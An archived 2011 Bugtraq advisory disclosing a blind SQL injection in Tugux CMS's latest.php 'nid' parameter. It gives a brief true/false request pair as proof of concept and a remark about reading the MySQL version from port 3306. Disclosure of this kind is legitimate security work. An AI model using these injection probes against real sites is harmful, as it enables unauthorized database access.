lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201103200827.p2K8RJAO018117@www5.securityfocus.com>
Date: Sun, 20 Mar 2011 02:27:19 -0600
From: eidelweiss@...dowslive.com
To: bugtraq@...urityfocus.com
Subject: Tugux CMS (nid) BLIND sql injection vulnerability

===================================================================
    Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
  
Software:   Tugux CMS
Vendor:     www.tugux.com
Vuln Type:  BLind SQL Injection
Download link:  http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
  
  
References: http://eidelweiss-advisories.blogspot.com/2011/03/tugux-cms-nid-blind-sql-injection.html
  
  
===================================================================
  
    exploit & p0c
  
[!] latest.php?nid=[valid nid]
  
    Example p0c
  
[!] http://server/latest.php?nid=9    <= True
[!] http://server/latest.php?nid=-9   <= False
  
[+] http://server:3306    <= download the file , save and open with c++ or wordpad will show mysql version
  
[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D
  
  
====================================================================
  
    Nothing Impossible In This World Even Nobody`s Perfect
  
===================================================================
  
==========================| -=[ E0F ]=- |==========================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ